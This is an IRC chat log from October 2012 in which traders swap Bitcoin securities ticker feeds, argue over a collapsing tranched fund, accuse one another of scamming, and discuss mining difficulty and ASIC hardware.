Oct 02 16:53:42 [GLBSE] [GSDPT] 1000 @ 0.0034 = 3.4 BTC [-] Oct 02 16:53:43 someone please explain that ito calculus wielding idiot that you don't unwind a cdo bottom up Oct 02 16:53:47 you unwind it top to bottom Oct 02 16:53:52 tell him copumpkin ! Oct 02 16:53:57 YES! **** BEGIN LOGGING AT Tue Oct 2 17:17:13 2012 Oct 02 17:18:28 this is so fucked up Oct 02 17:18:42 Just take everything and stick it in A Oct 02 17:18:53 kill off C and B Oct 02 17:19:07 why the fuck does C get assets from A and B? Oct 02 17:19:12 makes no sense Oct 02 17:19:18 he doesn't know what a cdo is. Oct 02 17:19:22 arbitrary and capricious Oct 02 17:19:40 no "we can use the overflow from NYAN.A to help repair the shareholders of NYAN.C." Oct 02 17:19:52 but in no event can C be paid anything if B is owed anything, and in no event can B be paid anything if A is owed anything Oct 02 17:19:57 this is the core concept of tranches Oct 02 17:22:03 [MPEX] [S.MPOE] 10000 @ 0.00036447 = 3.6447 BTC [+] Oct 02 17:25:38 [GLBSE] [GIGAMINING] 2 @ 0.60089899 = 1.2018 BTC [+] Oct 02 17:27:33 [GLBSE] [GSDPT] 200 @ 0.0034 = 0.68 BTC [-] Oct 02 17:35:34 last chance to buy GSDPT Oct 02 17:35:36 before the dividend Oct 02 17:35:39 the wall will soon go down Oct 02 17:35:51 Time to balance the backing before the dividend Oct 02 17:36:49 [GLBSE] [BTC-MINING] 1 @ 0.9312 BTC [-] Oct 02 17:36:51 [GLBSE] [BTC-MINING] 1 @ 0.9311 BTC [-] Oct 02 17:37:18 [10:17:26] oh look, .C becomes the proud owner of 2001 obsi.hrpt's. Oct 02 17:37:19 well Oct 02 17:37:21 to be fair Oct 02 17:37:25 thats what the world did to greece Oct 02 17:37:36 steal all the real assets and move all the toxic ones into it Oct 02 17:37:41 wha? Oct 02 17:37:43 greece? Oct 02 17:37:52 what ?! Oct 02 17:38:15 the whole goldman sachs fake mortgage paper scam Oct 02 17:38:17 that is not how I perceive greek financies Oct 02 17:38:44 he does have a point. the us banks have been selling everyone, from us municipalities to foreign nations Oct 02 17:38:48 greece is the one that ended up holding the bag on that Oct 02 17:38:49 derivative crap made out of toxic crap Oct 02 17:39:04 i wou;dnt go as far as that, but for sure there's a ton of misbehaviour Oct 02 17:39:22 but hey, if our great leaders do that, why is it wrong for usagi to do it Oct 02 17:39:35 "steal ALL the things \o/" -- goldman sachs motto Oct 02 17:39:36 that he's nobody's great leader lol Oct 02 17:39:42 euro banks too folks Oct 02 17:39:50 usagi: you're collapsing nyan.c for the lulz Oct 02 17:40:04 the trolls say you are so it must be true Oct 02 17:40:27 I scared usagi away :< Oct 02 17:40:34 Bugpowder no, just us :D Oct 02 17:40:53 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 17:41:11 BMF [1@0.49BTC] (since: 2012-10-01) paid: 0.00199044 BTC. Last price: 0.48 BTC. Capital gain: -0.01 BTC. Total: -0.00800956 BTC. (-1.6%) Oct 02 17:41:23 [GLBSE] [BFLS.RIG] 5 @ 0.81298522 = 4.0649 BTC [+] Oct 02 17:41:25 [GLBSE] [BFLS.RIG] 7 @ 0.8 = 5.6 BTC [-] Oct 02 17:43:57 [GLBSE] [ASICMINER] 1 @ 0.1111 BTC [-] Oct 02 17:44:58 https://bitcointalk.org/index.php?topic=112024.msg1238709#msg1238709 lol i like the new goat Oct 02 17:45:09 Chaang-Noi are you like this when you're drunk or when you're sober ? Oct 02 17:45:51 high... Oct 02 17:46:05 stick with it. Oct 02 17:46:10 on opium Oct 02 17:46:18 i just dont cae any more Oct 02 17:46:21 care Oct 02 17:46:31 i tried to do a good think with glbse and the btc assets stuff Oct 02 17:46:32 thing Oct 02 17:46:52 almost everyone including nefario hated me for it when i was his biggest support Oct 02 17:46:55 oh well, fuck them all Oct 02 17:47:26 maged told me i was going to banned unless i did something he demanded in 48 hours... Oct 02 17:47:34 such fucking bs Oct 02 17:47:40 [MPEX] [S.MPOE] 21990 @ 0.00036397 = 8.0037 BTC [-] Oct 02 17:47:41 and all cuz nefario lied Oct 02 17:47:56 and then maged covered for him and called a misunderstanind Oct 02 17:48:01 fuck them all Oct 02 17:48:14 aww Oct 02 17:49:19 Chaang-Noi: actually Oct 02 17:49:26 nefario is going to end up with a scammer tag Oct 02 17:49:40 Chaang-Noi: because he refuses to return the coins he stole from you Oct 02 17:49:47 tranching the tranche Oct 02 17:49:56 which also means all glbse links get automatically scammer tagged too Oct 02 17:49:58 yay url filter Oct 02 17:50:16 maged is pissed over the whole thing Oct 02 17:50:26 Chaang-Noi: too bad you arent a forum mod like me Oct 02 17:50:38 you're missing out on the shitstorm in the staff forum Oct 02 17:51:12 usagi: thatd Oct 02 17:51:13 er Oct 02 17:51:16 usagi: that'd be half the forum Oct 02 17:52:06 its the only reason why Im a mod and not an admin Oct 02 17:52:10 I really would ban half the forum Oct 02 17:52:50 !ticker dmc Oct 02 17:53:05 [GLBSE:DMC] [Bid: 0.02] [Ask: 0.05499999] [Spread: 0.03499999] [Last: 0.05] [24hVol: 0.05] [7dAvg: 0.07186227] Oct 02 17:53:06 Diablo-D3 lol are you allowed to quote ? :D Oct 02 17:53:23 mircea_popescu: nope, technically I shouldnt even talk about it Oct 02 17:53:29 but goats goat, and hes a cool guy Oct 02 17:53:54 goat's chasing teh dragon Oct 02 18:01:34 [GLBSE] [KRAKEN] 1 @ 0.00775 BTC [-] Oct 02 18:07:03 !ticker obsi.hrpt Oct 02 18:07:05 [GLBSE:OBSI.HRPT] [Bid: 0.0032] [Ask: 0.00389453] [Spread: 0.00069453] [Last: 0.003] [24hVol: 87.13085903] [7dAvg: 0.03527857] Oct 02 18:07:16 ouch Oct 02 18:07:24 Yeah Oct 02 18:07:50 !ticker bdk.bnd Oct 02 18:07:54 [GLBSE:BDK.BND] [Bid: 0.03000001] [Ask: 0.0495] [Spread: 0.01949999] [Last: 0.04] [24hVol: 20.44668999] [7dAvg: 0.04883857] Oct 02 18:08:14 I'm like slightly annoyed that I keep loosing 2% here 3% there, but at least I have gotten out of almost all the bullshit Oct 02 18:08:48 BDK.BND appears to have assets that support a NAV of 0.059, according to his spreadsheet. Oct 02 18:08:51 Bugpowder lol 2-3% is a lot better than what people are doing Oct 02 18:09:01 most of the hardcore glbse fans are literally -50% every quarter Oct 02 18:09:16 it's like buy OBSI, wait 2 days, panic sell for 8% loss Oct 02 18:09:24 watch as it goes to zero Oct 02 18:09:27 Try BTC-BOND bugpowder. Oct 02 18:09:30 no Oct 02 18:09:33 nono no Oct 02 18:09:38 Bugpowder: I know. I bought some at 0.03 before going to work, and sold them at 0.04 right after, easy +30%… Oct 02 18:09:39 nothing on GLBSE Oct 02 18:09:55 OneEyed that was sorta my plan Oct 02 18:10:01 but I bought too much Oct 02 18:10:09 I offer a very good protection margin against loss. Oct 02 18:10:12 Bugpowder: I have asks at .03, you can sell me :) Oct 02 18:10:13 couldn't exit the whole position cause volume is too low Oct 02 18:10:26 hahaha Oct 02 18:10:32 I bought yours at 0.04 Oct 02 18:10:40 Eheh :) The 104 ones? Thanks :) Oct 02 18:10:45 now someone buy them at 0.0495! Oct 02 18:11:02 totally worth it Oct 02 18:11:05 (I got 100 at 0.03, and someone sold me 4 at 0.02!) Oct 02 18:11:07 20% discount! Oct 02 18:11:19 i woke up too late I guess Oct 02 18:11:27 If Kluge can reimburse (and it looks like it will), you'll get much more than that by holding them if you can't get a good price anyway! Oct 02 18:11:44 yup Oct 02 18:11:53 I think he will pay out .059 Oct 02 18:11:58 I think he will pay much more Oct 02 18:12:06 .1? Oct 02 18:12:10 Around .09 Oct 02 18:12:24 well, act now and buy at .0495 Oct 02 18:12:33 255 shares Oct 02 18:12:35 avail Oct 02 18:12:43 deal of the century Oct 02 18:12:57 Nah, I just went out of GLBSE, I went back in to get some very cheap ones, I won't buy at more than .03, I'm sure someone will sell :) Oct 02 18:13:04 [MPEX] [S.MPOE] 26011 @ 0.00036397 = 9.4672 BTC [-] Oct 02 18:13:05 [MPEX] [S.MPOE] 12689 @ 0.00036158 = 4.5881 BTC [-] Oct 02 18:13:57 EskimoBob, although most people who present facts/ask questions are often dismissed as troll on the forum. In your case, it's kind of understandable. Incompetence is not equal to scamming and you keep harassing people as scammers when you believe they are incompetent. Oct 02 18:14:03 OneEyed 30% over what capital ? Oct 02 18:14:35 mircea_popescu: over what I bought; 100 * 0.03 * 1.005 + 2 * 0.02 = 3.055 Oct 02 18:14:42 But true enough, some OP dismiss anything other than "Let me give you all my money" as trolling. Oct 02 18:14:45 soooo you made 5 bux ? Oct 02 18:14:47 Sold them for 104 * 0.04 = 4.16 Oct 02 18:15:34 Well, yeah, 10€, not much, but it took no time and no energy, I just like that :) Oct 02 18:15:57 look, this is a profession, and it does have a cost Oct 02 18:16:08 unless there's a way to safely take 10k usd + bets we are just dicking around Oct 02 18:16:13 "daytrading" Oct 02 18:16:28 then i can see it :) Oct 02 18:16:33 I just fill time between compilations and test runs Oct 02 18:16:38 for me, good return on tiny capital just piss me off Oct 02 18:17:01 mircea_popescu: come on, we're talking about GLBSE, there is no way to make big bucks with such low liquidity, you know it :) Oct 02 18:17:01 Usagi, DMC, etc. Scamming is technically the willingful conning of money for keeping it for yourself. In their case you believe they are incompetent which is not willingful or taking money for themselve, yet still go around tagging them as scammers. Oct 02 18:17:18 maybe we need an incompetent tag? Oct 02 18:17:29 it could be yellow Oct 02 18:17:38 BTC-Mining the difference between wilful and incompetent melts away in some cases Oct 02 18:17:51 Or I might be wrong but I'm pretty sure you tagged them as scammers numerous times. Oct 02 18:17:53 the color of the undies when they realize they lost all the invested coins again Oct 02 18:17:57 "tony rocky horror shoulda fucken known better" in the immortal words of Oct 02 18:17:57 mircea: true that. Oct 02 18:17:59 i forget who Oct 02 18:19:04 I'd tend to agree with EskimoBob here. I'm fan of "don't attribute to malice what can be explained by stupidity", but in the bitcointalk world it looks like malice is often present Oct 02 18:20:37 where does one create a new contract on GLBSE? I don't see that option anywhere Oct 02 18:20:49 dont do it Oct 02 18:20:57 usagi: I don't bother hashking? I even filed *criminal charges* against him to get my money back! Oct 02 18:21:55 usagi: none, I haven't invested with you, nor accused you of anything, you must be confused. I only asked questions when I didn't understand your answer to posted facts. Check your logs :) Oct 02 18:22:33 Numbers Oct 02 18:22:36 As available Oct 02 18:23:22 The fact that you seem to consider a gain as a loss because when you convert to USD (which is not everyone's currency btw) this shows a gain? Oct 02 18:23:57 a loss as a gain Oct 02 18:24:00 [GLBSE] [JLP-BMD] 32 @ 0.0711 = 2.2752 BTC [+] Oct 02 18:24:04 I'm not saying it's your fault. I'm saying that I don't understand how it can be considered to have gained value. Oct 02 18:24:08 Eh. By the way Bugpowder, you know BTC-BOND offers a vast portfolio in front of loaned funds to prevent any loss? I also honor withdrawal upon requests. Oct 02 18:25:19 That I understand. But was it best for investors to invest or not to invest in your company in this timeframe? Oct 02 18:25:31 It was best for them to keep their bitcoins out of BMF, right? Oct 02 18:27:13 Why would BTC fall? Oct 02 18:27:28 BTC-Mining, Sorry I'm sticking to MPEX securities, I don't think GLBSE will be around by Nov 1st. Oct 02 18:28:05 Ah, believe GLBSE is going bust. Fair enough. Oct 02 18:28:05 You still don't answer: wouldn't it have been best for investors to have kept their BTC out of BMF into a cold wallet? They could resold them for a better profit than if they went in and out of BMF, isn't it? Oct 02 18:28:32 (I'm not talking about the future, I'm talking about the timeframe from May to now that you took as an example) Oct 02 18:28:44 OneEyed yes Oct 02 18:28:47 Bugpowder nov 1st, that bad ? i was thinking a quarter or two myself. Oct 02 18:28:48 six months Oct 02 18:28:54 If I had $500 then, I would have $1000 now by having bought then sold bitcoins. Oct 02 18:28:54 Difficulty adjusts itself... less bitcoins will be entering the market, especially after the block halving. Oct 02 18:29:22 usagi: so you're saying that BMF is a good investment now, but how can you say it has been a good investment between May and now? Oct 02 18:29:29 ^^ y and if you dont hold it you risk a price rise :) Oct 02 18:29:48 Well... I have only been following it for a month... can we plot the decline in volume somehow Oct 02 18:30:16 but looking now backward it would have brought more USD if you had keept your BTC in a cold wallet Oct 02 18:30:43 And I can start the cycle again and limit my € losses Oct 02 18:30:46 (even if I limit my profit) Oct 02 18:31:36 and if it rise, you lose money... Oct 02 18:31:39 usagi: you say that like it's a good thing Oct 02 18:31:40 OneEyed why be so safe ? i dumped into btc since about forever. Oct 02 18:32:03 usagi: Why not keep it simple? "Bitcoin mining is a USD based investment" Oct 02 18:32:03 not those who kept their btc in a cold wallet..... Oct 02 18:32:20 mircea_popescu: because since July I've tried to convince myself of the usefulness of bitcoins, and I'm still not much convinced. I've seen almost no use except for trading. Oct 02 18:32:42 OneEyed heh. bitcoin is literally the only currency in the world atm. Oct 02 18:32:58 everything else is govt bonds carrying no interest. Oct 02 18:33:17 and if you would have kept your BTC you would have made more... Oct 02 18:33:33 Also, has nefario executed a single adminitrative duty on GLBSE in the past week? Oct 02 18:33:38 red flag Oct 02 18:34:34 nefario is often busy, he's not always around. Oct 02 18:34:47 what, a week at a time ? Oct 02 18:34:54 you leave someone behind if you're gone for a week come on./ Oct 02 18:34:55 he is emailing people Oct 02 18:35:19 dude imagine your corner 7/11 closed for a week cause owner was busy Oct 02 18:35:33 I'm not aware of him not working/managing GLBSE right now. Oct 02 18:35:41 wow kakobrekla i didn't know you swere such a scammer ;) Oct 02 18:35:42 He's just not in IRC. Oct 02 18:35:53 yeah im terrible. Oct 02 18:38:22 Because actual miners have a much larger profit than actual bond holders (especially fixed) Oct 02 18:38:56 BTC-Mining arguably they also do a lot more of the work Oct 02 18:39:04 [MPEX] [F.GIGA.ETF] 5200 @ 0.0004418 = 2.2974 BTC [-] Oct 02 18:39:06 [MPEX] [S.MPOE] 3443 @ 0.00036158 = 1.2449 BTC [-] Oct 02 18:39:06 [MPEX] [S.MPOE] 1200 @ 0.00036114 = 0.4334 BTC [-] Oct 02 18:39:07 [MPEX] [S.MPOE] 14057 @ 0.00036075 = 5.0711 BTC [-] Oct 02 18:39:28 Aye but they pay too little. Oct 02 18:40:48 BTC-Mining, the problem is not the small "interest" you get, its more the dramatic price drop Oct 02 18:41:12 all mining bonds made something between 1.5% and 2% interest a week Oct 02 18:41:13 [GLBSE] [PLATINUM] 1 @ 0.00999999 BTC [+] Oct 02 18:41:46 exactly Oct 02 18:41:59 [GLBSE] [BITNODES] 2 @ 0.265 = 0.53 BTC [-] Oct 02 18:42:36 EskimoBob its the same when you buy mining equip yourself... Oct 02 18:43:04 ... sure Oct 02 18:43:37 not really Oct 02 18:44:05 [GLBSE] [JTME] 1 @ 0.65 BTC [-] Oct 02 18:45:21 All i say is that mining isnt lucrative right now, not if you buy the equip yourself and not if you buy bonds Oct 02 18:46:05 but who would have expected that huge difficulty increase the past few weeks Oct 02 18:46:08 noone Oct 02 18:46:18 so you cannot blame anybody for any loss you made Oct 02 18:47:31 usagi or not? Oct 02 18:47:54 [GLBSE] [NASTY] 1 @ 0.481 BTC [-] Oct 02 18:47:55 [GLBSE] [NASTY] 1 @ 0.48 BTC [-] Oct 02 18:48:26 Eisenhower34 you think this is huge ? Oct 02 18:48:33 back Oct 02 18:48:37 i have bets with people claiming > 100 th in the coming months Oct 02 18:48:41 did I miss mutch? Oct 02 18:49:26 boring as usual Oct 02 18:50:17 micea You know the answer yourself... and you should know that you cannot really compare asig TH scale iwth GPU GH scale, same as you couldnt compare GPU <-> CPU MH scales Oct 02 18:50:28 Eisenhower34: well, you can COMPARE Oct 02 18:50:34 its just going to be a pretty scary ratio Oct 02 18:51:16 [GLBSE] [NASTY] 1 @ 0.48 BTC [-] Oct 02 18:51:43 Eisenhower34 im just saying, people are betting this. if it comes true, Oct 02 18:51:49 it will make the prev increase seem like nothing. Oct 02 18:52:02 after all, the system doesn't care where you get your hashing, it's all fungible. Oct 02 18:52:36 I wish luke would quit reporting posts Oct 02 18:52:40 no one listens to him Oct 02 18:53:58 I only say that you stated the obvious which doesnt really deserves any answer Oct 02 18:54:18 its like someone saying "snow is white" Oct 02 18:54:47 you said huge increase, i said it's possibly not even that huge. what's the issue ? Oct 02 18:55:15 "you think this is huge ?" " i have bets with people claiming > 100 th in the coming months" <- Cpt Obvious to the rescue! Oct 02 18:55:39 thats what I say Oct 02 18:55:49 ... Oct 02 18:56:01 do you have some sort of previous unresolved issue eating at you ? Oct 02 18:57:59 Did anyone see any ASIC-like increase in hashpower, be it on mainnet or on testnet? Oct 02 18:58:10 Sorry but you didnt understood the more polite way telling you that, what did you expect me to say? Oct 02 18:58:44 Don't think anyone has, OneEyed Oct 02 18:59:05 [GLBSE] [DMC] 21 @ 0.05499984 = 1.155 BTC [+] Oct 02 18:59:06 [GLBSE] [DMC] 1 @ 0.05499985 BTC [+] Oct 02 18:59:08 [GLBSE] [DMC] 50 @ 0.055 = 2.75 BTC [+] Oct 02 18:59:09 [GLBSE] [DMC] 148 @ 0.065 = 9.62 BTC [+] Oct 02 18:59:31 I can't make my mind on whether this is a scam or not, or more exactly on whether they do have a product ready or not (even if they intend to have one eventually) Oct 02 18:59:56 [GLBSE] [GSDPT] 103 @ 0.0034 = 0.3502 BTC [-] Oct 02 19:00:00 Demonstrating it on testnet would be the best way to get free advertising Oct 02 19:00:07 [GLBSE] [GOLD] 2 @ 0.00999998 = 0.02 BTC [+] Oct 02 19:00:34 [GLBSE] [DMC] 2 @ 0.065 = 0.13 BTC [+] Oct 02 19:00:36 [GLBSE] [DMC] 10 @ 0.067 = 0.67 BTC [+] Oct 02 19:00:56 OneEyed I would let it run first for myself Oct 02 19:00:57 [GLBSE] [GOLD] 2 @ 0.00999998 = 0.02 BTC [+] Oct 02 19:01:01 for a week or something like that Oct 02 19:01:04 before i deliver them :) Oct 02 19:01:14 Eisenhower34: I would too, but for some reason I don't understand BFL said it wouldn't Oct 02 19:01:52 OneEyed they "say" of course they wouldnt, but its on a different page what they really do :) Oct 02 19:02:30 Eisenhower34: sure :) And it's true that it will be much more easy to conceal once they have delivered some ASICs, as they will be harder to identify. Oct 02 19:03:13 y maybe they already mine with some of their products Oct 02 19:03:33 the last rise from June 2012 looks very suspicious Oct 02 19:03:53 and could be caused by ASIC mining Oct 02 19:03:57 [GLBSE] [BITBOND] 1 @ 0.27 BTC [+] Oct 02 19:04:52 What happened to ciuciu recently? He seemed to be a nice guy, had pretty interesting deals, but now looks like he shorted a fuse over mircea_popescu and the porn pictures Oct 02 19:05:24 [GLBSE] [GOLD] 8 @ 0.00999998 = 0.08 BTC [+] Oct 02 19:05:42 mircea_popescu: did you do anything to him? I don't understand why he goes after MPEX every time he can. Do you owe him money or what? Oct 02 19:06:32 [GLBSE] [DMC] 9 @ 0.075 = 0.675 BTC [+] Oct 02 19:06:49 What does "peddler" mean? Oct 02 19:06:57 vend/sell Oct 02 19:07:01 Thanks pigeons :) Oct 02 19:07:14 Oh, I thought the porn on mircea_popescu site was free for all :) Oct 02 19:07:33 hmm i thought so too Oct 02 19:08:33 who said you have to get the facts right when you're trolling? Oct 02 19:09:12 imsaguy2: sure, but he tries very hard to get at MPEX and Mircea, so I guess he really has some motive Oct 02 19:09:13 [GLBSE] [ASICMINER] 1 @ 0.1111 BTC [-] Oct 02 19:09:41 Because it's not even entertaining, not humorous, not a good troll Oct 02 19:09:48 [GLBSE] [OBSI.HRPT] 1 @ 0.00389453 BTC [+] Oct 02 19:09:54 [GLBSE] [ASICMINER] 1 @ 0.1111 BTC [-] Oct 02 19:11:11 or when you're repeating info that's wrong. Oct 02 19:11:24 Trolling is an art, that was taught by masters on Usenet in the ol'good days, before even AOL was allowed to access the news Oct 02 19:12:04 [GLBSE] [MERGEDMINING] 5 @ 0.055 = 0.275 BTC [-] Oct 02 19:12:24 ... Oct 02 19:12:31 I remember times when dropping "should I use vi or emacs to edit the configuration file?" in any software newsgroup would degenerate rapidly Oct 02 19:12:31 OneEyed: I guess he considers that porn peddler Oct 02 19:12:39 to whom were you referring? Oct 02 19:12:40 [MPEX] [F.GIGA.ETF] 3000 @ 0.00044181 = 1.3254 BTC [+] Oct 02 19:12:44 imsaguy2: mircea_popescu Oct 02 19:13:05 imsaguy2: I was asking why ciuciu seemed to be so angry at Mircea Oct 02 19:13:10 [GLBSE] [ASICMINER] 1 @ 0.1111 BTC [-] Oct 02 19:13:11 mircea_popescu sells porn? Oct 02 19:13:19 [GLBSE] [MERGEDMINING] 12 @ 0.0515 = 0.618 BTC [-] Oct 02 19:13:35 AFAICS, he hosts a BBS which includes porn Oct 02 19:14:26 again? Oct 02 19:15:17 [GLBSE] [MERGEDMINING] 1 @ 0.0496 BTC [-] Oct 02 19:15:19 [GLBSE] [MERGEDMINING] 4 @ 0.04101 = 0.164 BTC [-] Oct 02 19:15:20 [GLBSE] [MERGEDMINING] 10 @ 0.04 = 0.4 BTC [-] Oct 02 19:16:19 *That* would cause a huge price drop Oct 02 19:16:43 [GLBSE] [GIGAMINING] 2 @ 0.59999692 = 1.2 BTC [-] Oct 02 19:17:21 pirate pays => price drop => people invest into BMF to hedge against BTC price drop => I see what you did here usagi :) Oct 02 19:18:02 imsaguy2 no dude. i had some involvement back before 2000 Oct 02 19:18:20 some involvement = silent partner/financing some studios and also ocasionally producing. Oct 02 19:18:31 technically, the bbs isn't his site Oct 02 19:18:38 they are two different things Oct 02 19:18:50 imsaguy2: ok, hosted under the same root Oct 02 19:19:06 OneEyed the girl (mpoe-pr) called some bond of his a scam or w/e Oct 02 19:19:28 No. Oct 02 19:19:39 mircea_popescu: wow, I guess the girl hit a nerve then Oct 02 19:19:49 i have no ideea, not like anyone's buying it or anything Oct 02 19:20:08 i mean it can't be a ponzi on the strength of lack of volume alone. Oct 02 19:20:12 EskimoBob: is that illegal? Oct 02 19:20:35 (I'm checking, because I have no idea either) Oct 02 19:20:52 Registrants of .us domains must be United States citizens, residents, or organizations, or a foreign entity with a presence in the United States. Oct 02 19:21:05 (according to wikipedia, not the most reliable source, but generally good enough) Oct 02 19:21:24 [GLBSE] [GSDPT] 23 @ 0.0034 = 0.0782 BTC [-] Oct 02 19:21:25 "To ensure that these requirements are met, NeuStar frequently conducts "spot checks" on registrant information." Oct 02 19:21:30 dude lay it to rest already. i have us companies, my cto is an american citizen, etfc Oct 02 19:21:39 i have every right in the world to register .us Oct 02 19:22:48 [GLBSE] [BITNODES] 1 @ 0.27849 BTC [+] Oct 02 19:23:21 [GLBSE] [GIGAMINING] 4 @ 0.59999792 = 2.4 BTC [+] Oct 02 19:23:31 [GLBSE] [BMMO] 4 @ 0.04100001 = 0.164 BTC [+] Oct 02 19:23:32 [GLBSE] [CPA] 2 @ 0.0386 = 0.0772 BTC [-] Oct 02 19:23:40 [GLBSE] [GSDPT] 23377 @ 0.0034 = 79.4818 BTC [-] Oct 02 19:23:50 [GLBSE] [CPA] 2 @ 0.01500001 = 0.03 BTC [-] Oct 02 19:23:57 [GLBSE] [BMMO] 1 @ 0.041 BTC [-] Oct 02 19:24:04 !pl cpa .1 Oct 02 19:24:05 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 19:24:11 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.01500001 BTC. Capital gain: -0.08499999 BTC. Total: -0.07930311 BTC. (-79.3%) Oct 02 19:24:21 usagi, I can't just go and give you hardware and screw everyone else Oct 02 19:24:26 !pl .gsdpt .0032 Oct 02 19:24:27 you don't have that sort of priority Oct 02 19:24:27 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 19:24:35 GLBSE 404 Oct 02 19:24:36 [GLBSE] [BMMO] 8 @ 0.04 = 0.32 BTC [-] Oct 02 19:24:40 ugh Oct 02 19:24:43 !pl gsdpt .0032 Oct 02 19:24:45 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 19:24:52 GSDPT [1@0.0032BTC] paid: 7.468E-5 BTC. Last price: 0.0034 BTC. Capital gain: 0.0002 BTC. Total: 0.00027468 BTC. (8.6%) Oct 02 19:24:56 Status Quo Oct 02 19:24:59 wait so if you have a leading period on the symbol glbse 404's ? Oct 02 19:24:59 [GLBSE] [GSDPT] 12 @ 0.0034 = 0.0408 BTC [-] Oct 02 19:25:19 [GLBSE] [YABMC] 5 @ 0.075 = 0.375 BTC [-] Oct 02 19:25:26 might be just a dirty fallback Oct 02 19:25:27 actually 8.6% a month is kinda jawdropping Oct 02 19:25:47 [GLBSE] [YABMC] 1 @ 0.075 BTC [-] Oct 02 19:26:01 [GLBSE] [YARR] 1 @ 0.8 BTC [-] Oct 02 19:26:22 [GLBSE] [FZB.A] 1 @ 0.02972999 BTC [+] Oct 02 19:26:22 ??? Oct 02 19:26:23 [GLBSE] [FZB.A] 1 @ 0.02973 BTC [+] Oct 02 19:26:24 [GLBSE] [FZB.A] 4 @ 0.03 = 0.12 BTC [+] Oct 02 19:26:42 I thought YARR couldn't be traded anymore. I must have confused that with something else. Oct 02 19:26:58 umm Oct 02 19:27:03 [GLBSE] [FZB.A] 2 @ 0.0221002 = 0.0442 BTC [-] Oct 02 19:27:04 i thought so too !? Oct 02 19:27:04 [GLBSE] [FZB.A] 3 @ 0.02 = 0.06 BTC [-] Oct 02 19:27:05 [GLBSE] [FZB.A] 1 @ 0.00000005 BTC [-] Oct 02 19:27:22 nefario/glbse did send me some coins. Oct 02 19:27:32 i guess he will avoid the scammer tag for now Oct 02 19:27:50 some = ? Oct 02 19:28:25 not that it matters, i cant send the btc to anyone Oct 02 19:28:30 now i just ahve to hold it forever Oct 02 19:28:41 Chaang-Noi: why, he forgot to send the private key along? Oct 02 19:28:43 I assume these are for the "non disputed" BTC Oct 02 19:28:44 [GLBSE] [GIGAMINING] 2 @ 0.59999792 = 1.2 BTC [+] Oct 02 19:28:52 was this your btc ? your assets' btc ? is there all of it ? Oct 02 19:29:07 yeah i asked for the non disputed btc he was holding hostage Oct 02 19:29:10 OneEyed no but he's liable for it to shareholders Oct 02 19:29:15 the disputed btc i assume he can make a claim fore Oct 02 19:29:32 i was just sent some btc Oct 02 19:29:39 he did not send me assets clearly Oct 02 19:29:50 it ahs 4 confrims Oct 02 19:30:02 wait, what ? Oct 02 19:30:02 nefario has been sending me e-mails daily Oct 02 19:30:05 he is alive Oct 02 19:30:17 well this "some btc" needs to be clarified wtf it means Oct 02 19:30:26 he sent me some btc Oct 02 19:30:35 i have more btc than i did Oct 02 19:31:20 usagi: more importantly, he didn't explain those (potentially) bad decisions. He pretty much destroyed part of the trust people need to have in him. Oct 02 19:31:46 he has not explained why i was delisted, i want the fees refunded Oct 02 19:32:18 if i broke some tos or something he needs to tell me, if he offers a service, takes payment then fails to give service its scamming Oct 02 19:32:40 that is typical nefario Oct 02 19:32:45 says he will do shit Oct 02 19:32:49 then takes it back and says fuck you Oct 02 19:32:55 now if you bitch, he will delist you Oct 02 19:33:55 usagi: are you implying that you know about irregularities? Oct 02 19:34:11 It sure looked like it :) Oct 02 19:34:50 [GLBSE] [BIB.BVPS] 1 @ 0.00387999 BTC [+] Oct 02 19:34:51 [GLBSE] [BIB.BVPS] 5 @ 0.00388 = 0.0194 BTC [+] Oct 02 19:34:52 I would trust you not to use them because you disagree with a business relationship Oct 02 19:34:53 [GLBSE] [BIB.BVPS] 5 @ 0.00389 = 0.0195 BTC [+] Oct 02 19:35:11 If there wouldnt be so many douchebags out there, calling me a scammer all day, i would have already opened a stock market myself... would take ~2 weeks to code it ... Oct 02 19:35:40 Eisenhower34: mine would be more like MPEX than GLBSE if I'd do one Oct 02 19:35:41 Eisenhower34 coding isn;'t the biggest deal. also, who and why is calling you a scammer ? Oct 02 19:35:45 i don't even know who you are. Oct 02 19:36:35 :) Oct 02 19:36:44 [GLBSE] [BIB.BVPS] 10 @ 0.003 = 0.03 BTC [-] Oct 02 19:36:46 [GLBSE] [BIB.BVPS] 1 @ 0.00181 BTC [-] Oct 02 19:37:22 read the thread here https://bitcointalk.org/index.php?topic=109415.0 already tried to open a project but it doesnt make much sense with all those idiots out there Oct 02 19:38:23 insurance ? Oct 02 19:39:06 [MPEX] [S.MPOE] 43900 @ 0.00036273 = 15.9238 BTC [+] Oct 02 19:39:16 ok this is nonsense. Oct 02 19:39:16 that was the idea, but as it has already been pointed out several times its a CDS Oct 02 19:39:29 aynway doesnt matter what it was Oct 02 19:39:47 you lack any verbiage as to the important points : 1. how are claims decided ; 2. how are people prevented from buying insurance on themselves and default. Oct 02 19:39:55 with all those idiots asking for doxx and implying that im a scammer Oct 02 19:40:07 [GLBSE] [BITCOINRS] 2 @ 0.043 = 0.086 BTC [-] Oct 02 19:40:24 everyone is assumed to be pirate nowdays Oct 02 19:40:27 Eisenhower34 that'd be a different problem : you've made a website for something that already happens otc Oct 02 19:40:48 nobody wants/needs it, and if they did they'd make it (those people who already trade cds otc, that is) Oct 02 19:41:09 [GLBSE] [BITCOINRS] 1 @ 0.0344 BTC [-] Oct 02 19:41:10 [GLBSE] [BITCOINRS] 1 @ 0.001 BTC [-] Oct 02 19:42:09 thats not the problem. the problem are those comments : "Government ID please. ""We wouldn't want this to be another scam right?""Are you willing to provide a legal adress under which someone could be held accountable in case of fraud?" "I'll never conduct business with a "company" who refuses to even tell me the address where they are based." Oct 02 19:42:49 actually, greyhawk has a point. specifically In that case you are of course aware that providing no contact information/full "Impressum" for your "business" is illegal under German legislation. Your website is a perfect opportunity for an Abmahnanwalt to sue the fuck out of you. Oct 02 19:43:07 this is factually correct. Oct 02 19:43:19 im in the internet biz for more than 5 years Oct 02 19:43:26 and I have never been sued Oct 02 19:43:38 this is a poor argument tho. Oct 02 19:43:55 my server and domains are hosted in USA Oct 02 19:44:12 and i have a Whois protection Oct 02 19:44:27 Satoshi dice September net profit: 2065.3 BTC Oct 02 19:44:28 Nice! Oct 02 19:44:33 [GLBSE] 